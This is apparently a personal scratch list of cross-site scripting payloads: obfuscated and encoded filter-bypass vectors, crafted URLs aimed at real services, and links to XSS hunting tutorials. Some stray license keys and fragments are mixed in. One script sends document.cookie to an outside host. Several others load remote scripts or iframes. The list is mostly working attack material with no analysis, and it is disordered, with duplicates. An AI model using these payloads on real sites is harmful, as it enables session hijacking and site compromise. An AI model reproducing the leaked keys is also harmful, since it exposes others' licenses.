[email protected]
by 'confirm(1)' "confirm(1)"
1. 32
2. <img src="/" =_=" title="onerror='prompt(1)'">
3. %253cscript%253ealert(/xss-by-shawar/)%253c/script%253e
4. imp :
5. <form><iframe 	  src="javascript:alert(1)" 	;>
6. DOM : --><iframe%0A%0Dsrc%3Dhttp%3A%2F%2Faxmerc28.5gbfree.com%2Findex.html><%2Fiframe>
7. http://shawarkhan.byethost7.com/?input=--%3E%3Ciframe%0A%0Dsrc%3Dhttp%3A%2F%2Faxmerc28.5gbfree.com%2Findex.html%3E%3C%2Fiframe%3E
8. <a href="//%0aalert(/@irsdl/);//">Possible XSS - works in Chrome</a>
9. <!--<img src="--><img src=x onerror=alert(123)//">
10. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���
11. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���
12. callback=<if
13. -%22%3E%3Cscript%3Ealert%28document.cookie%29%3C
14. '"--><script>alert(/Xss2ro07 aKa Side3ffects)</script>
15. <script>location.href="https://testingxssrj.000webhostapp.com/cookiefile.php?cookie=document.cookie<script>"
15.1. '<svg onload="alert('xx')">'
16. <script language="JaVaScript">
17. for dom : javascript:alert%281%29
17.1. javascript:prompt(document.domain);
18. <body onload=alert("XSS")>
19. ');alert('XSS
20. ssltest
21. A3-K7QCDX-F544N9-QYLM3-S4CBC-4DSZP-YH63X
22. http://www.<script>alert(1)</script .com
23. 2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
24. Account Lockout Hackerone
25. 5) <img/src=`%00` onerror=this.onerror=confirm(1)
26. 7) <img src=`%00`
 onerror=alert(1)

27. 9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
28. 11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
29. 13) <iframe/src="data:text/html,<svg onload=alert(1)>">
30. 15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
31. 17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
32. 19) <form><a href="javascript:\u0061lert(1)">X sssssssssssssssss
33. 21) <img/	  src=`~` onerror=prompt(1)>
34. 23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
35. 25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
36. 27) <style/onload=prompt('XSS')
37. 29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
38. 31) <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> ss
39. 33) <iframe srcdoc='<body onload=prompt(1)>'>
40. 35) <script ~~~>alert(0%0)</script ~~~> abh
41. 37) <///style///><span %2F onmousemove='alert(1)'>SPAN
42. 39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
43. 41) <marquee onstart='javascript:alert(1)'>^__^
44. 43) <iframe/%00/ src=javaSCRIPT:alert(1)
45. 45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
46. 47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
47. 49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
48. 51) <a href="javascript:\u0061le%72t(1)"><button> ss
49. 53) <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
50. 55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
51. 57) <var onmouseover="prompt(1)">On Mouse Over</var>
52. 59) <img src="/" =_=" title="onerror='prompt(1)'">
53. 61) <script src="data:text/javascript,alert(1)"></script>
54. 63) <iframe/onreadystatechange=alert(1)
55. 65) <input value=<><iframe/src=javascript:confirm(1)
56. 67) http://www.<script>alert(1)</script .com
57. 69) <svg><script ?>alert(1)
58. 71) <img src=`xx:xx`onerror=alert(1)>
59. 73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
60. 75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
61. 77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
62. 79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
63. 81) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
64. 83) <script>+-+-1-+-+alert(1)</script>
65. 85) <script itworksinallbrowsers>/*<script* */alert(1)</script
66. 87) <svg><script>//
confirm(1);</script </svg>
67. 89) ss<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
68. 91) <div/onmouseover='alert(1)'> style="x:">
69. https://www.google.com.pk/webhp?sourceid=chrome-instant&ion=1&espv=2&ie=UTF-8#q=metasploit+tp+link
70. 93) <script/src=data:text/javascript,alert(1)></script>
71. 95) "><img src=x onerror=window.open('https://www.google.com/');>
72. 97) ss<math><a xlink:href="//jsfiddle.net/t846h/">click
73. 99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>ss
74. 100) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
75. 0300 7014685
76. %3E%3Cimg+src%3Dx+onerror%3Dprompt(1)%3B%3E
77. HTTP Cashe Poisoning issue
78. Detecting Xss with advance fuzzer
79. ]Detecting and Exploiting XSS with Xenotix XSS Exploit
80. Discovering XSS Vulnerabilities with Burp Intruder
81. check it soon
82. https://<your_instance>.my.salesforce.com/setup/ui/replacePickList.jsp?msg=This%20is%20dom%20based%20XSS+%3Cimg%20src=M%20onerror=prompt%281%29;%3E&retURL=%2Fsetup%2Fui%2Fpicklist_masterdetail.jsp%3Ftid%3D03j%26pt%3D45%26retURL%3D%252Fui%252Fsetup%252FSetup%253Fsetupid%253DCase%26setupid%3DCaseContactRoles&tableName=CaseContactRole&id=45&setupid=CaseContactRoles
83. 1) <iframe %00 src="	javascript:prompt(1)	"%00>
84. Build > Activities me Task field done
85. Product Key: D275-7NPG-2YPB-PFBR
86. <marquee onstart='javascript:alert("note")'>^__^
87. <img/	  src=`~` onerror=prompt(1)>
88. http://shawarkhan.byethost7.com/?input=--%3E%3Ciframe%0A%0Dsrc%3Dhttp%3A%2F%2Faxmerc28.5gbfree.com%2Findex.html%3E%3C%2Fiframe%3E
89. <base href="javascript:\">
90. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">s
91. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���
92. *���>]]>%>?></object></script></title></textarea></noscript></style></xmp>���-/"/-alert(1)//><img src=1 onerror=alert(1)>���
93. '"--></style></script><script>alert("XSSed by Cyb3R_Shubh4M")
94. rame src='http://xssed.com'
95. /script%3E-
96. http://go.mcafee.com/activation.cfm?firewall_id=%22%20style=%22background-image:url%28%27http://i.imgur.com/oHp8A.gif%27%29%22%20onfocus=%22document.write%28String.fromCharCode%2860%29%2B%27iframe%20src=http://xssed.com%20height=100%25%20width=100%25%3E%27%2BString.fromCharCode%2860%29%2B%27/iframe%3E%27%2BString.fromCharCode%2860%29%2B%27script%3Ealert%28/XSS%20/%29%27%2BString.fromCharCode%2860%29%2B%27/script%3E%27%29%22%20foo=%22bar
97. '<img src="c" onload="alert(1)">'
98. fixEscape
99. https://www.collective2.com/cgi-perl/verify.mpl?pid=102085904&k=30124476804813
100. %27|alert%28%27XSS%27%29|%27
101. all vulnerabilities videos : https://www.youtube.com/watch?v=d1D7twRO5Ys
102. http://ssl-checker.online-domain-tools.com/
103. javascript:alert(document.domain)
103.1. "><script>alert(1);</script>#"><img src=x onerror=prompt(1);>
104. <var onmouseover="prompt(1)">On Mouse Over</var>
105. 3) <input/onmouseover="javaSCRIPT:confirm(1)"
106. 4) <sVg><scRipt %00>alert(1) {Opera}
107. 6) <form><isindex formaction="javascript:confirm(1)"
108. 8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
109. 10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
110. 12) "><h1/onmouseover='\u0061lert(1)'>%00
111. 14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
112. 16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
113. 18) <iframe src=javascript:alert(document.location)>
114. 20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
115. 22) <form><iframe 	  src="javascript:alert(1)" 	;>
116. 24) http://www.google<script .com>alert(document.location)</script
117. 26) <img/src=@  onerror = prompt('1') sss
118. 28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
119. 30) �</form><input type="date" onfocus="alert(1)"> sssssssssssss
120. 32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
121. 34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
122. 36) <style/onload=<!--	> alert (1)>
123. 38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
124. 40) <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
125. 42) <div/style="width:expression(confirm(1))">X</div> {IE7}
126. 44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
127. 46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
128. 48) <a/href="javascript: javascript:prompt(1)"><input type="X">
129. 50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
130. 52) <div onmouseover='alert(1)'>DIV</div>
131. 54) <a href="jAvAsCrIpT:alert(1)">X</a> ssss
132. 56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
133. 58) <a href=javascript:alert(document.cookie)>Click Here</a> sss
134. 60) <%<!--'%><script>alert(1);</script -->
135. 62) <iframe/src \/\/onload = prompt(1)
136. 64) <svg/onload=alert(1)
137. 66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
138. 68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
139. 70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
140. 72)
141. 74) ss <math><a xlink:href="//jsfiddle.net/t846h/">click
142. 76) <svg contentScriptType=text/vbs><script>MsgBox+1
143. 78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
144. 80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
145. 82) <object data=javascript:\u0061le%72t(1)>
146. 84) <body/onload=<!-->
alert(1)>
147. 86) <img src ?itworksonchrome?\/onerror = alert(1)
148. 88) <svg><script onlypossibleinopera:-)> alert(1)
149. 90) <script x> alert(1) </script 1=2
150. 92) <--`<img/src=` onerror=alert(1)> --!>
151. Your License Key: 7SCQ-P3LE-F6RE-DYYC
152. 94) <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>ss
153. 96) ss<form><button formaction=javascript:alert(1)>CLICKME
154. 98) ss<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
155. ss
156. https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester
157. New
158. http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html
159. Email Change Request Dosent Expir After Password Change
160. www.youtube.com/watch?v=R8AgEWPFJ1g
161. https://www.exploit-db.com/docs/21223.pd
162. http://bughunting.guide/discovering-xss-vulnerabilities-with-burp-intruder/
163. https://fdhdhdfhdh-dev-ed.my.salesforce.com/ui/support/servicedesk/ServiceDeskHotkeyEditor/e?retURL=%2Fui%2Fsupport%2Fservicedesk%2FServiceDeskHotkeyEditor%2Fd%3Ftsid%3D02u28000000LOiq&tsid=02u28000000LOiq#